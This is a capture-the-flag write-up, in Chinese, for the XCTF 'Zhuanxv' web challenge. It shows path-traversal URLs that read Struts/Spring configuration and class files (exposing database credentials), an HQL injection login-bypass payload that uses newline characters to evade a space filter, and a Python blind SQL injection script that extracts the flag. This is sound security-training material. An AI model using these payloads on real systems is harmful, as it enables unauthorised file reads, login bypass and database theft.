攻防世界-web-Zhuanxv(任意文件读取、万能密钥、sql盲注 )
题目来源:XCTF 4th-SCTF-2018
题目描述:你只是在扫描目标端口的时候发现了一个开放的web服务
进入场景后是一个显示时间的页面
使用dirsearch扫描一下,发现隐藏目录list。命令:
python3 dirsearch.py -u http://220.249.52.133:43210/ -e *
访问list目录,发现是一个后台登录页面
抓包发现背景图片是从后台加载的一张图片
或者从网页源代码也可以看出
猜测这里可能有文件读取漏洞。
cookie中的JSESSIONID说明这是一个java web,那么我们尝试读取一下配置文件web.xml
浏览器输入
http://220.249.52.133:43210/loadimage?fileName=../../WEB-INF/web.xml
回车,下载下来一个bg.jpg,使用Notepad++打开,内容如下
<?xml version="1.0" encoding="UTF-8"?> <web-app id="WebApp_9" version="2.4" xmlns="http://java.sun.com/xml/ns/j2ee" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://java.sun.com/xml/ns/j2ee http://java.sun.com/xml/ns/j2ee/web-app_2_4.xsd"> <display-name>Struts Blankdisplay-name> <filter> <filter-name>struts2filter-name> <filter-class>org.apache.struts2.dispatcher.ng.filter.StrutsPrepareAndExecuteFilterfilter-class> filter> <filter-mapping> <filter-name>struts2filter-name> <url-pattern>/*url-pattern> filter-mapping> <welcome-file-list> <welcome-file>/ctfpage/index.jspwelcome-file> welcome-file-list> <error-page> <error-code>404error-code> <location>/ctfpage/404.htmllocation> error-page> web-app>
可以看到,系统使用了struts2框架。
struts.xml是struts2的核心配置文件,在开发过程中利用率最高。该文件主要负责管理应用中的Action映射,以及该Action包含的Result定义等。
下面我们读取struts.xml看看,浏览器输入
http://220.249.52.133:43210/loadimage?fileName=../../WEB-INF/classes/struts.xml
回车,下载下来一个bg.jpg,使用Notepad++打开,内容如下
<?xml version="1.0" encoding="UTF-8"?> DOCTYPE struts PUBLIC "-//Apache Software Foundation//DTD Struts Configuration 2.3//EN" "http://struts.apache.org/dtds/struts-2.3.dtd"> <struts> <constant name="strutsenableDynamicMethodInvocation" value="false"/> <constant name="struts.mapper.alwaysSelectFullNamespace" value="true" /> <constant name="struts.action.extension" value=","/> <package name="front" namespace="/" extends="struts-default"> <global-exception-mappings> <exception-mapping exception="java.lang.Exception" result="error"/> global-exception-mappings> <action name="zhuanxvlogin" class="com.cuitctf.action.UserLoginAction" method="execute"> <result name="error">/ctfpage/login.jspresult> <result name="success">/ctfpage/welcome.jspresult> action> <action name="loadimage" class="com.cuitctf.action.DownloadAction"> <result name="success" type="stream"> <param name="contentType">image/jpegparam> <param name="contentDisposition">attachment;filename="bg.jpg"param> <param name="inputName">downloadFileparam> result> <result name="suffix_error">/ctfpage/welcome.jspresult> action> package> <package name="back" namespace="/" extends="struts-default"> <interceptors> <interceptor name="oa" class="com.cuitctf.util.UserOAuth"/> <interceptor-stack name="userAuth"> <interceptor-ref name="defaultStack" /> <interceptor-ref name="oa" /> interceptor-stack> interceptors> <action name="list" class="com.cuitctf.action.AdminAction" method="execute"> <interceptor-ref name="userAuth"> <param name="excludeMethods"> execute param> interceptor-ref> <result name="login_error">/ctfpage/login.jspresult> <result name="list_error">/ctfpage/welcome.jspresult> <result name="success">/ctfpage/welcome.jspresult> action> package> struts>
这里class里面可以看到很多class类名,尝试了一下,都可以逐个下载,点号换成正斜杠,然后再在后面加个.class就可以下载了
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/UserLoginAction.class
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/DownloadAction.class
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/UserOAuth.class
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/action/AdminAction.class
由于下载下来的class文件无法正常阅读,我们需要将其反编译成java源代码。
打开jd-gui工具,将class文件直接拖进去即可。
挨个查看了一下,没发现什么有用的信息,倒是UserLoginAction.class里面引入了3个其他的类,同样的办法继续下载
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/po/User.class
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/service/UserService.class
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/util/InitApplicationContext.class
依次打开后,我们在InitApplicationContext.class里找到了一个applicationContext.xml文件名。
下载
http://220.249.52.133:43210/loadimage?fileName=../../WEB-INF/classes/applicationContext.xml
内容如下
<?xml version="1.0" encoding="UTF-8"?> <beans xmlns="http://www.springframework.org/schema/beans" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xsi:schemaLocation="http://www.springframework.org/schema/beans http://www.springframework.org/schema/beans/spring-beans.xsd"> <bean id="dataSource" class="org.springframework.jdbc.datasource.DriverManagerDataSource"> <property name="driverClassName"> <value>com.mysql.jdbc.Drivervalue> property> <property name="url"> <value>jdbc:mysql://localhost:3306/sctfvalue> property> <property name="username" value="root"/> <property name="password" value="root" /> bean> <bean id="sessionFactory" class="org.springframework.orm.hibernate3.LocalSessionFactoryBean"> <property name="dataSource"> <ref bean="dataSource"/> property> <property name="mappingLocations"> <value>user.hbm.xmlvalue> property> <property name="hibernateProperties"> <props> <prop key="hibernate.dialect">org.hibernate.dialect.MySQLDialectprop> <prop key="hibernate.show_sql">trueprop> props> property> bean> <bean id="hibernateTemplate" class="org.springframework.orm.hibernate3.HibernateTemplate"> <property name="sessionFactory"> <ref bean="sessionFactory"/> property> bean> <bean id="transactionManager" class="org.springframework.orm.hibernate3.HibernateTransactionManager"> <property name="sessionFactory"> <ref bean="sessionFactory"/> property> bean> <bean id="service" class="org.springframework.transaction.interceptor.TransactionProxyFactoryBean" abstract="true"> <property name="transactionManager"> <ref bean="transactionManager"/> property> <property name="transactionAttributes"> <props> <prop key="add">PROPAGATION_REQUIREDprop> <prop key="find*">PROPAGATION_REQUIRED,readOnlyprop> props> property> bean> <bean id="userDAO" class="com.cuitctf.dao.impl.UserDaoImpl"> <property name="hibernateTemplate"> <ref bean="hibernateTemplate"/> property> bean> <bean id="userService" class="com.cuitctf.service.impl.UserServiceImpl"> <property name="userDao"> <ref bean="userDAO"/> property> bean> beans>
这里暴露了数据库的端口用户名密码,尝试远程连接数据库,失败。
我们发现这里还有一个user.hbm.xml以及很多class类名,那我们继续下载查看
loadimage?fileName=../../WEB-INF/classes/user.hbm.xml
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/service/impl/UserServiceImpl.class
loadimage?fileName=../../WEB-INF/classes/com/cuitctf/dao/impl/UserDaoImpl.class
从UserServiceImpl.class里,我们可以看到,系统对用户名进行了过滤,过滤了空格和等号。
从UserDaoImpl.class里,我们可以看到查询语句,这里使用的sql语句与mysql不太一样,使用的是HSQL。
hsql参考这篇文章,与mysql语句差别不大,但是也是有区别的
可以尝试构造万能密码
from User where name ='admin' or '1'>'0' or name like 'admin' and password = '" + password + "'
黄色部分就是拼接的语句,由于这里过滤了空格,可以考虑用换行符%0A替代空格绕过过滤
payload:
用户名:admin'%0Aor%0A'1'>'0'%0Aor%0Aname%0Alike%0A'admin 密码:123(随意)
登录成功,然而并没有找到flag。
再看一下之前下载的user.hbm.xml文件内容,发现了flag的映射类。
<?xml version="1.0"?> DOCTYPE hibernate-mapping PUBLIC "-//Hibernate/Hibernate Mapping DTD 3.0//EN" "http://hibernate.sourceforge.net/hibernate-mapping-3.0.dtd"> <hibernate-mapping package="com.cuitctf.po"> <class name="User" table="hlj_members"> <id name="id" column="user_id"> <generator class="identity"/> id> <property name="name"/> <property name="password"/> class> <class name="Flag" table="bc3fa8be0db46a3610db3ca0ec794c0b"> <id name="flag" column="welcometoourctf"> <generator class="identity"/> id> <property name="flag"/> class> hibernate-mapping>
至此,我们知道,flag在数据库中。
由于万能密钥成功登录的原因是'1'>'0'恒成立,我们可以在此处写payload构造盲注语句,爆破flag。
官方wp如下
import requests s=requests.session() flag='' for i in range(1,50): p='' for j in range(1,255): payload = "(select%0Aascii(substr(id,"+str(i)+",1))%0Afrom%0AFlag%0Awhere%0Aid<2)<'"+str(j)+"'" #print payload url="http://220.249.52.133:33772/zhuanxvlogin?user.name=admin'%0Aor%0A"+payload+"%0Aor%0Aname%0Alike%0A'admin&user.password=1" r1=s.get(url) #print url #print len(r1.text) if len(r1.text)>20000 and p!='': flag+=p print i,flag break p=chr(j)
跑出来flag为:sctf{C46E250926A2DFFD831975396222B08E}
坦白说,这个脚本中payload的where id<2我不明白是什么意思,后来我尝试了一下,将payload中的where id<2删除后再爆破,发现也能成功。猜想Flag表中应该只有一个id列。
参考:https://www.cnblogs.com/mke2fs/p/11519039.html